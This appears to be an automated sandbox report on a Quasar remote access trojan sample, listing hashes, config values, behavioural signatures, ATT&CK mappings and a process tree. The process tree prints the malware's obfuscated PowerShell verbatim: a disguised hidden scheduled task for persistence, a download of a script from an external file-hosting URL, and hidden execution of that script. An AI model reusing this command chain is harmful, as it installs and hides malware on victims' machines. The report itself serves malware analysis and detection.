quasar | bfa990bda3eebc658bcd0014dbfc9d57277e585548031f7ce4ecfcc8223f7b6b

Analysis

max time kernel
118s
max time network
134s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
19/04/2025, 15:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Installer.exe
Size

53KB
MD5

f323bb458ecbd21acdddd5ea770e775f
SHA1

9b04a6ea2e6efcc81d344f6425928c5700e9a3f6
SHA256

4030427f5e93a3cbb5072fe12afb02a4cb6447a4d0061b4dc9f71fdb783ab926
SHA512

ca08182341611a89da1f4c90efbd065691a551e68d534ed509bf3ffca8d821362be14b175cfb8378fc2199432938c1d3e63524d9424802a37c0435467a5dabe2
SSDEEP

768:ZId0rRueeCTXZJa0CMpWBUlNP/hA8OE2fbsE/g0+EFiRs:ZId+KQXZPCiWBU8fAL5eim

Score

10^/10

quasar execution spyware trojan

Malware Config

Extracted

Family

quasar

��:a>՘�后��s��6�F�l濺�,@ 3&�

Attributes

encryption_key
0A2600918F5E13281DD3F3E3CF35CA2FEACB6884
reconnect_delay
3000
startup_key
�� D��s�+��\� r8t$�

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral4/memory/1480-59-0x00000203A8630000-0x00000203A87BE000-memory.dmp	family_quasar

Blocklisted process makes network request 3 IoCs

flow	pid	Process
18	4632	powershell.exe
46	1480	powershell.exe
48	1480	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2592	powershell.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1480	powershell.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2592	powershell.exe
2592	powershell.exe
4632	powershell.exe
4632	powershell.exe
1480	powershell.exe
1480	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	5324	Installer.exe
Token: SeBackupPrivilege	5324	Installer.exe
Token: SeDebugPrivilege	5324	Installer.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeIncreaseQuotaPrivilege	2592	powershell.exe
Token: SeSecurityPrivilege	2592	powershell.exe
Token: SeTakeOwnershipPrivilege	2592	powershell.exe
Token: SeLoadDriverPrivilege	2592	powershell.exe
Token: SeSystemProfilePrivilege	2592	powershell.exe
Token: SeSystemtimePrivilege	2592	powershell.exe
Token: SeProfSingleProcessPrivilege	2592	powershell.exe
Token: SeIncBasePriorityPrivilege	2592	powershell.exe
Token: SeCreatePagefilePrivilege	2592	powershell.exe
Token: SeBackupPrivilege	2592	powershell.exe
Token: SeRestorePrivilege	2592	powershell.exe
Token: SeShutdownPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeSystemEnvironmentPrivilege	2592	powershell.exe
Token: SeRemoteShutdownPrivilege	2592	powershell.exe
Token: SeUndockPrivilege	2592	powershell.exe
Token: SeManageVolumePrivilege	2592	powershell.exe
Token: 33	2592	powershell.exe
Token: 34	2592	powershell.exe
Token: 35	2592	powershell.exe
Token: 36	2592	powershell.exe
Token: SeIncreaseQuotaPrivilege	2592	powershell.exe
Token: SeSecurityPrivilege	2592	powershell.exe
Token: SeTakeOwnershipPrivilege	2592	powershell.exe
Token: SeLoadDriverPrivilege	2592	powershell.exe
Token: SeSystemProfilePrivilege	2592	powershell.exe
Token: SeSystemtimePrivilege	2592	powershell.exe
Token: SeProfSingleProcessPrivilege	2592	powershell.exe
Token: SeIncBasePriorityPrivilege	2592	powershell.exe
Token: SeCreatePagefilePrivilege	2592	powershell.exe
Token: SeBackupPrivilege	2592	powershell.exe
Token: SeRestorePrivilege	2592	powershell.exe
Token: SeShutdownPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeSystemEnvironmentPrivilege	2592	powershell.exe
Token: SeRemoteShutdownPrivilege	2592	powershell.exe
Token: SeUndockPrivilege	2592	powershell.exe
Token: SeManageVolumePrivilege	2592	powershell.exe
Token: 33	2592	powershell.exe
Token: 34	2592	powershell.exe
Token: 35	2592	powershell.exe
Token: 36	2592	powershell.exe
Token: SeIncreaseQuotaPrivilege	2592	powershell.exe
Token: SeSecurityPrivilege	2592	powershell.exe
Token: SeTakeOwnershipPrivilege	2592	powershell.exe
Token: SeLoadDriverPrivilege	2592	powershell.exe
Token: SeSystemProfilePrivilege	2592	powershell.exe
Token: SeSystemtimePrivilege	2592	powershell.exe
Token: SeProfSingleProcessPrivilege	2592	powershell.exe
Token: SeIncBasePriorityPrivilege	2592	powershell.exe
Token: SeCreatePagefilePrivilege	2592	powershell.exe
Token: SeBackupPrivilege	2592	powershell.exe
Token: SeRestorePrivilege	2592	powershell.exe
Token: SeShutdownPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeSystemEnvironmentPrivilege	2592	powershell.exe
Token: SeRemoteShutdownPrivilege	2592	powershell.exe
Token: SeUndockPrivilege	2592	powershell.exe
Token: SeManageVolumePrivilege	2592	powershell.exe
Token: 33	2592	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1480	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 5324 wrote to memory of 2104	5324	Installer.exe	88
PID 5324 wrote to memory of 2104	5324	Installer.exe	88
PID 2104 wrote to memory of 5888	2104	cmd.exe	89
PID 2104 wrote to memory of 5888	2104	cmd.exe	89
PID 5888 wrote to memory of 2100	5888	winAPI.dll	90
PID 5888 wrote to memory of 2100	5888	winAPI.dll	90
PID 2100 wrote to memory of 3612	2100	cmd.exe	91
PID 2100 wrote to memory of 3612	2100	cmd.exe	91
PID 3612 wrote to memory of 3256	3612	cmd.exe	92
PID 3612 wrote to memory of 3256	3612	cmd.exe	92
PID 3612 wrote to memory of 2592	3612	cmd.exe	93
PID 3612 wrote to memory of 2592	3612	cmd.exe	93
PID 3612 wrote to memory of 4632	3612	cmd.exe	95
PID 3612 wrote to memory of 4632	3612	cmd.exe	95
PID 3612 wrote to memory of 1480	3612	cmd.exe	104
PID 3612 wrote to memory of 1480	3612	cmd.exe	104
PID 1480 wrote to memory of 5192	1480	powershell.exe	105
PID 1480 wrote to memory of 5192	1480	powershell.exe	105
PID 5192 wrote to memory of 1216	5192	csc.exe	106
PID 5192 wrote to memory of 1216	5192	csc.exe	106

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3256	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Installer.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c winAPI.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2104
- - C:\Users\Admin\AppData\Local\Temp\winAPI.dll
    winAPI.dll
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2100
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3612
      - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache"
        6⤵
        Views/modifies file attributes
        
        PID:3256
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Execu"t"ionPolic"y" Byp"a"ss -Windo"w"Style Hid"d"en -Com"m"and "$action = New-ScheduledT"a"skAction -Execute 'powershell.exe' -Argument '-NoProfile -Exe"c"utionPo"l"icy B"y"pass -Wind"o"wStyle Hidden -File \"C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1\"'; $trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME; $settings = New-ScheduledTaskSettingsSet -Hidden -DontStopIfGoingOnBatteries; $principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive; Register-ScheduledTask -TaskName 'Micro"s"oftEdge"U"pdat"e"Task' -Action $action -Trigger $trigger -Settings $settings -Principal $principal -Force | Out-Null"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2592
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoPr"o"file -Exe"c"utionPol"i"cy By"p"ass -Win"d"owStyle H"i"dd"e"n -Co"m"mand "Invo"k"e-W"e"bRequ"e"st 'ht"t"ps://"f"iles."c"atbo"x".moe/92nbzf.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1' -Use"B"asicParsing"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        
        PID:4632
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -N"o"Profi"l"e -Execu"t"ionPol"i"cy Bypa"s"s -WindowSt"y"le Hi"d"den -Fi"l"e "C:\Users\Admin\AppData\Roaming\Mi"c"roso"f"t\Wi"n"dows\UD"C"ache\t"a"sk.ps1"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1480
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\phadtqne\phadtqne.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:5192
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2C36.tmp" "c:\Users\Admin\AppData\Local\Temp\phadtqne\CSC754F20D3D8C84A068AF97276120A282.TMP"
        8⤵
        
        PID:1216

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c4508edcc2adee10aa7a02e94f911388

SHA1
190bf0e3c6ab3efe46447dd4e7b16de20c82fb66

SHA256
a0e77b81908c10a39ef8006720c5465387c9057852f3cfed8b0b4b1ecf3c9ad2

SHA512
ffe1e072530aa03ba2e0ae9c29e14a6f94afe9913b963a4436fba2a7b4248c220a35b4ade4872befdff40ac66e79f0ac1fd975c181dadcfa0af7210df3818326

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
986e30667187a068166dce45669a2829

SHA1
284093cad6751bdf22fdf091da8d3a230dc7f65b

SHA256
1261aefed76439cee6407e31bfae7de72f40a4905275bdba52842cc7251ef098

SHA512
3f4d461a3fc77158fa6d79481e925bfcb857312cf6fc806987041e03086989efcd621fe8ebd19715b1d0f5a086d3a09595010be9b52f433c2ce932cf02e4f187

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.bat

Filesize
1KB

MD5
56ed4e1fbde1df51fb37b6677265ec3d

SHA1
6dc4cf3ebe6c0043c6fca9b5c9c46a3f5a492d17

SHA256
d65e44cd5593e4f8d380c23516e94db3b18e9a5c42ef40697beb2a611aaa9204

SHA512
c9c037b3713d2774301a4d68beee7c528fd2ade5aac95f06c82b1ef9f23ba47ec316cfc0d711fd773c8c81fd33366537395daee361325c5465cf02eb6dae41c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2C36.tmp

Filesize
1KB

MD5
11962ea7997da7a5e0c656aebac31fc8

SHA1
344bb42f85ef3c5480b705df2d083006eaa1f82c

SHA256
e9f9fd749a224e8a0d8ea2a2c4627bc7f137fd239bedc4ad978d30ca2d2434b4

SHA512
daf78477b00ce0b77772ed6701d51450254bb41ca968f682ac39efc03d1a1a32431d8802f94f6c86f3edb6d42df4b65335c396b3a2273b537ced4f4f5b1e6633

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4iiivltt.es2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\phadtqne\phadtqne.dll

Filesize
3KB

MD5
4341d6d7749e3b07deb078c1b9037181

SHA1
fa99c0e4be27c038b8209dd469e23d136ab04cd0

SHA256
6ce0fae83429f0dbd04884fa9610838bdcbd67da35ba41306852269f7c06adb8

SHA512
ef858b2fb0eca73933a398af0635672e2ec1823f9a338c5812195de54a7fa6a056f2371fa696ece021a28382a13ed29fcd1b20ea45271c7c78af42fee651e27b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\UDCache\task.ps1

Filesize
7.0MB

MD5
f46cd513598c2b1ffb63fe501301dd64

SHA1
d1d71cfdc9ea551470478b2452d0e451b8d055e8

SHA256
e8d38cba909fb2374dc0a406fcc0c4360ffb12ba5d588856690e7e06657e6df5

SHA512
bbd43f0f9b7eddc0857ac14339859e0e6b756de8749e54795d86bcdb580d6bf369a5a4050231bf1bdb361ff817907175180f04f352df2e35fce63fbeb4f91974

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\phadtqne\CSC754F20D3D8C84A068AF97276120A282.TMP

Filesize
652B

MD5
c3791b8cbc10907a931616d44fb2442e

SHA1
7fe38bddc1a9c8a6e3ccd56746104b72227a5fe7

SHA256
222b2f99ebfd8f9e8e6caabdaadfdbca46a368cc6523de5bddab45513eda892d

SHA512
43327055249a8265eec8bf9e855f4c9ace28ab5ef2c9d87e830ec03c681e692191597a38210a3bc46b593fd52de19ae0c2111feebd426bc655ca166e2eb8206c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\phadtqne\phadtqne.0.cs

Filesize
938B

MD5
5b328f64341f326554c2d3c08ace5f93

SHA1
25a9aad6022782e5200d410aa9ff8e707ee2eb1a

SHA256
6e7a0c2174ae7882e6bd3f4afdf0438b982649021048df980b08c5ac948a01b9

SHA512
d4116697a54bc21a8d77aaa8eeafa95d60b6873073f2294d027829a83dc82bf39d63f08464b7622dcfd4ec3a1991b6225f72399321a5f93582d84387088badd0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\phadtqne\phadtqne.cmdline

Filesize
369B

MD5
03048e793261569d5a65a13a25013e51

SHA1
bcc07cc3393a804246b1b9b27230805d04fc65f6

SHA256
9321da83cd99799508b5429b03f5d1e5ab2c5e041a55d7efb723b9da0f985056

SHA512
07d0a40fc8a8c139b3541c5865fd6f7d4e99150f8a7ec7d32e1cb6ca212088fb08025a64827763b42fc45805b57d392bf0e65cad840b99e878ce6443c1cf300d

Download Submit
memory/1480-63-0x00000203FDE20000-0x00000203FDE70000-memory.dmp

Filesize
320KB

Download
memory/1480-62-0x00000203A85B0000-0x00000203A85EA000-memory.dmp

Filesize
232KB

Download
memory/1480-55-0x00000203A8000000-0x00000203A8008000-memory.dmp

Filesize
32KB

Download
memory/1480-70-0x00000203FDEB0000-0x00000203FDEEC000-memory.dmp

Filesize
240KB

Download
memory/1480-69-0x00000203FDDF0000-0x00000203FDE02000-memory.dmp

Filesize
72KB

Download
memory/1480-57-0x00000203A8020000-0x00000203A818A000-memory.dmp

Filesize
1.4MB

Download
memory/1480-59-0x00000203A8630000-0x00000203A87BE000-memory.dmp

Filesize
1.6MB

Download
memory/1480-60-0x00000203A84B0000-0x00000203A84CA000-memory.dmp

Filesize
104KB

Download
memory/1480-61-0x00000203A85A0000-0x00000203A85B2000-memory.dmp

Filesize
72KB

Download
memory/1480-67-0x00000203A8D50000-0x00000203A8D9A000-memory.dmp

Filesize
296KB

Download
memory/1480-68-0x00000203A85F0000-0x00000203A861A000-memory.dmp

Filesize
168KB

Download
memory/1480-64-0x00000203FDF30000-0x00000203FDFE2000-memory.dmp

Filesize
712KB

Download
memory/1480-65-0x00000203A8CB0000-0x00000203A8CFE000-memory.dmp

Filesize
312KB

Download
memory/1480-66-0x00000203A8D00000-0x00000203A8D4C000-memory.dmp

Filesize
304KB

Download
memory/2592-9-0x000001ADF1E50000-0x000001ADF1E72000-memory.dmp

Filesize
136KB

Download
memory/5324-0-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/5324-29-0x0000000210040000-0x0000000210346000-memory.dmp

Filesize
3.0MB

Download
memory/5324-27-0x0000000100400000-0x000000010040D000-memory.dmp

Filesize
52KB

Download